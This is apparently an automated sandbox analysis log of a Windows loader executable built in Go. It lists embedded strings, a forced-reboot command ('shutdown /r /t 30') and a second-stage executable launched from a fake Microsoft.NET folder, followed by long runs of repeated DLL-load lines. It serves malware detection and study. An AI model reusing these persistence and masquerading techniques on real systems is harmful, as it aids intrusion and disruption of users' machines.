Source: leg#U00edvel9931-009-140.08372236.exe String found in binary or memory: failed to construct HKDF label: %stoo many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: CM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=http: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%hash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9reflect.MakeSlice of non-slice typeunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharemime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlineSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong 
Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)'_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: leg#U00edvel9931-009-140.08372236.exe String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
Source: leg#U00edvel9931-009-140.08372236.exe String found in binary or memory: C:/Users/Administrator/Documents/Loaders/TempGo-leg
Source: unknown Process created: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe "C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe"
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 30
Source: C:\Windows\System32\shutdown.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe "C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe"
Source: unknown Process created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe "C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe"
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 30
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\shutdown.exe Section loaded: shutdownext.dll
Source: C:\Windows\System32\shutdown.exe Section loaded: sspicli.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: classiciedll_64.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: magnification.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: d3d9.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wldp.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: amsi.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: userenv.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: profapi.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: dxcore.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: dcomp.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: winmm.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: winsta.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
